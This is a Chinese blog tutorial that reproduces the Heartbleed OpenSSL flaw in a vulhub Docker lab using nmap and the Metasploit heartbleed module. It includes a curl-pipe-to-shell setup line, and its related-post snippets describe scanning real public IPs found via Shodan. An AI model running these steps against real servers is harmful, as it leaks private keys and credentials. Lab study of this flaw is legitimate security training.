OpenSSL 心脏滴血漏洞(CVE-2014-0160)漏洞复现(保姆级教学)

已于 2024-04-07 01:19:54 修改
阅读量691 收藏 10
点赞数 6
分类专栏: 漏洞复现 文章标签: 网络安全
于 2024-02-29 13:28:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69043895/article/details/136368604
版权

没有废话,直接开始复现

准备环境:

两台虚拟机:

靶机 Ubuntu 安装教程查看:安装Ubuntu虚拟机_乌班图镜像-CSDN博客

攻击机:kali

注意配置两台机器同一网段 可以相互ping通

复现步骤

部署靶机

  •  首先配置Ubuntu环境
1、安装docker:
   apt-get install -y docker.io
2、安装docker-compose:
   pip install docker-compose
3、配置 docker 加速器(提高容器下载速度):
   curl -sSL https://get.daocloud.io/daotools/set_mirror.sh | sh -s http://f1361db2.m.daocloud.io
3、下载vulhub漏洞目录:
   git clone https://github.com/vulhub/vulhub.git

  • 下载完成之后使用root用户查看root目录下的文件

此时已经可以看到vulhub 文件夹

  • 2. 输入以下命令
cd ~/vulhub/openssl/CVE-2014-0160 
# 进入心脏滴血的漏洞文件夹
  • 输入命令
docker-compose up -d
#安装漏洞环境

  • 到这里靶机的环境就搭建完成了,如果不放心可以使用命令
docker ps
#查看运行状态

看到如下状态,就代表运行正常,接下来攻击

攻击

  • 使用kali 扫描
nmap -sV -T4 192.168.10.129

  • 打开msf

search heartbleed

msf6 > use auxiliary/scanner/ssl/openssl_heartbleed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 192.168.10.129
rhosts => 192.168.10.129
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 8443
rport => 8443
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

到这里,就攻击成功了

nuc_ddddsj
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
patch-openssl-CVE-2014-0160:使用 ansible 修补 openssl #heartbleed
07-09
补丁openssl-CVE-2014-0160 使用 ansible 修补 openssl #heartbleed 用法 : pip install ansible ansible-playbook -i your_inventory_file patch-openssl-CVE-2014-0160.yml your_inventory_file 只需要包含您的服务器列表: 192.168.0.10 webserver1.example.com webserver2.example.com db1.example.com 支持 在 Debian 系列操作系统上升 openssl 重启部分服务受影响 去做 重启更多服务 重新生成 SSL 证书 支持更多操作系统 测试是否需要打补丁 % openssl version -a OpenSSL 1.0.1 14 Mar 2012 b
一次简单的心脏滴血漏洞利用CVE-2014-0160
热门推荐
ranuy阮的博客
03-01 1万+
1、心脏滴血漏洞简述 2014年4月7日,OpenSSL发布安全公告,在OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞OpenSSL库中用到了该心跳协议。HeartBle...
心脏滴血漏洞详解(CVE-2014-0160
最新发布
m0_64481831的博客
03-23 1027
OpenSSL是一个开放源代码的软件库包,提供了一组加密和认证协议,用于保护网络连接和数据传输的安全性。它实现了SSL和TLS协议,包含了主要的密码算法、常用的密钥和整数封装管理功能。OpenSSL的作用是提供安全通信和数据加密的功能,在数据安全存储、数据传输、身份验证等领域中发挥着重要作用。
OpenSSL 心脏滴血漏洞(CVE-2014-0160)漏洞讲解(小白可懂,简单详细)
Innocence_0的博客
03-02 1547
靶机:centos7 192.168.139.136攻击机:kali 192.168.139.129确保两台测试机网络能通。
心脏出血漏洞复现CVE-2014-0160
GaLeng_Yang的博客
09-01 750
认识:首先简单介绍一下这个漏洞,该漏洞是一个出现在加密程序库OpenSSL的安全漏洞,这个程序呢,是在传输层协议TLS协议之上,这个协议呢被称为心跳协议,这个漏洞就是在心跳协议的工作过程中窃取到一些重要数据,因此这个漏洞的名字被称为心脏出血。危害:远程读取服务器内存中64K的数据,获取内存中的敏感信息,非法入侵获取到密码等加密数据。影响版本:OpenSSL的1.0.1版本到1.0.1f版本。
心脏滴血漏洞复现
杨过的博客
06-10 398
漏洞出现在2014年的openssl的1.0.1版本,虽然年代久远,但是依然是经典的漏洞,值得多复现几次,体会其中的原理。
OpenSSL 心脏滴血漏洞(CVE-2014-0160)
weixin_50217210的博客
12-25 510
当B收到A的请求包后,并没有验证A包的实际长度,而是简单的把请求包中说明的长度当作data的实际长度,于是当请求包中说明的长度与请求包实际长度不同时,问题就产生了。假设A构造一个请求包,它的实际内容长度只有1,而却告诉B它的长度是65535,那么B接收到这个包后就会把A的内容当作65535来处理,其实到这里,问题还不算严重,最严重的问题出在,心跳的响应包还需要附带请求包还需要附带请求包的全部内容,这就需要程序做一次将请求包的数据从它所在的内容拷贝到响应包的内存里的操作。(因为攻击者可能通过漏洞获取私钥。
渗透测试-Openssl心脏出血漏洞复现
道阻且长,行则将至。
06-21 1万+
Vulhub 简介 Vulhub是一个基于 docker 和 docker-compose 的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。关于Docker技术,读者可通过我另一篇博文进行学习:渗透测试-Docker容器。 Vulhub 的特点: 完全开源,几乎不使用非官方的二进制文件、镜像; 百分之95以上的环境是从 docker 基础镜像编译而来,你可以看到每一个环境是怎样建造的; 所有漏洞靶场均包含漏洞原理、参考链接、
opensslCVE-2014-0160心脏出血漏洞复现
m0_62008601的博客
08-02 1569
心脏出血是openssl库中的一个内存漏洞,攻击者利用这个漏洞可以服务到目标进程内存信息,如其他人的cookie等敏感信息。HeartbleedBug是流行的OpenSSL加密软件库中的一个严重漏洞。此弱点允许在正常情况下窃取受用于保护Internet的SSL/TLS加密保护的信息。SSL/TLS为Web、电子邮件、即时消息(IM)和一些虚拟专用网络(VPN)等应用程序提供Internet上的通信安全和隐私。...
openssl 1.0.1a---心脏滴血漏洞复现
qq_46527080的博客
01-05 1504
心脏滴血漏洞复现 首先用shadan进行搜索主机 搜索格式为 openssl 1.0.1a 然后随便找一个请求为200的主机进行漏扫 一、使用专门的工具进行扫描 219.117.252.132 发现这个主机没有可以利用的 我们需要再换一个 149.202.69.214 发现可以有一个可以利用的 二、使用nmap工具进行扫描 nmap -sV -p 443 149.202.69.214 --script=ssl-heartbleed.nse 发现下面给爆出了漏洞编号 漏洞发现完成之后,我们就该利用了 打开
解决OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160)安全漏洞,升OpenSSLOpenSSL 1.0.1g
10-25
近期服务器开放的https的访问,确被安全组扫描出安全漏洞OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160)),为修复该漏洞,升OpenSSLOpenSSL 1.0.1g,同时重新编译升OpenSSH和nginx,在此提供...
OpenSSL拒绝服务漏洞 (CVE-2022-0778) poc证书
03-24
下载后执行 openssl x509 -in 2022_0778.pem -inform DER -text -noout 或者在自己产品证书管理界面上传证书验证 参考https://github.com/drago-96/CVE-2022-0778 制作证书验证
heartbleed.js:openssl Heartbleed bug(CVE-2014-0160) 检查 Node.js
06-09
针对 Node.js 的 openssl Heartbleed 错误检查 检查结果 {"code":0,"data":"1803021003020ff0d8030253435b909d9b720bbc0cbc2b92a84897cfbd3904cc160a8503909..."} code: 0易受攻击。 (存在漏洞) code: 1不易受...
解决OpenSSL "SSL-Death-Alert" 拒绝服务漏洞(CVE-2016-8610)安全漏洞,升OpenSSLOpenSSL 1.1.0k
10-25
最近放开了https服务,安全组扫描出新的漏洞,现对原OpenSSL 1.0.1g版本升OpenSSL 1.1.0k,同时重新编译OpenSSH及nginx,在此提供升脚本,仅供参考
CVE-2021-3449 OpenSSL拒绝服务漏洞复现
麻辣小龙虾
05-20 4025
1,漏洞描述 OpenSSL 是一个常用的软件库,用于构建需要建立安全通信的网络应用和服务器。当前,OpenSSL 项目针对潜伏在 OpenSSL 产品中的高危漏洞 CVE-2021-3449具体如下。 CVE-2021-3449:由于 NULL 指针取消引用而导致的拒绝服务(DoS)漏洞,只影响 OpenSSL 服务器实例,而不影响客户端 2,影响范围 OpenSSL 1.1.1到1.1.1j版本 3,复现准备 服务器:win7虚拟机 攻击机:kali exp:cve-2021-3449-main 4,复
心脏滴血漏洞详解及利用--HeartBleed With OpenSSL
NoobMaster的博客
02-23 1万+
【事件规则】 OpenSSL心脏出血”漏洞是一个非常严重的问题。这个漏洞使攻击者能够从内存中读取多达64 KB的数据。也就是说,只要有这个漏洞的存在,在无需任何特权信息或身份验证的环境下,我们就可以从我们自己的(测试机上)偷来X.509证书的私钥、用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据。 OpenSSL漏洞分析 最初人们为了网络通信安全,就开始使用安全协议进行加密通...
openssl心脏滴血漏洞
haha1314的博客
07-15 4965
Heartbleed漏洞,这项严重缺陷(CVE-2014-0160)的产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。 简单理解: OpenSSL:没有检测心跳包中的长度字段是否和后续的数据字段相符合...
Samba远程代码执行漏洞(CVE-2017-7494)复现
m0_48520508的博客
01-06 2479
0x00简介 Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。 0x
Openssl心脏出血”漏洞分析及其利用
weixin_34186950的博客
04-11 810
本帖最后由 simeon 于 2014-4-11 10:54 编辑www.antian365.com simeon一、openssl漏洞形成原因4月7日,互联网安全协议OpenSSL被曝存在一个十分严重的安全漏洞。在***社区,它被命名为“心脏出血”,表明网络上出现了“致命内伤”。利用该漏洞,***可以获取约30%的https开头网址的用户登录账号密码,其中包括购物、网银、社交、门户等类型的知名网...
OpenSSL命令注入漏洞CVE-2022-1292)
07-28
回答: OpenSSL命令注入漏洞CVE-2022-1292)是指在OpenSSL 1.0.2版本中存在的漏洞。为了修复这个漏洞,你需要将OpenSSL 1.0.2升到SSL 3版本。首先,你可以使用以下命令查看OpenSSL的版本信息:\[1\] ``` openssl version ``` 然后,你可以从OpenSSL官方网站下载SSL 3的升包。下载地址可以在官方网站上找到。\[2\]你可以使用以下命令下载升包: ``` wget https://www.openssl.org/source/openssl-3.0.5.tar.gz ``` 下载完成后,解压升包并进入解压后的目录: ``` tar -zxvf openssl-3.0.5.tar.gz cd openssl-3.0.5/ ``` 接下来,你可以使用以下命令进行编译和安装: ``` ./config shared zlib make make install ``` 在安装之前,建议备份原始文件。安装完成后,你可以添加新的OpenSSL软连接,并将编译后的库文件写入so库配置文件。具体操作可以参考相关文档或官方指南。\[2\] 请注意,升OpenSSL可能会对系统产生影响,请确保在操作之前备份重要数据,并在升过程中谨慎操作。 #### 引用[.reference_title] - *1* *2* *3* [openssl 漏洞 (CVE-2015-4000/CVE-2022-1292)](https://blog.csdn.net/qq_44637753/article/details/126829820)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

nuc_ddddsj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值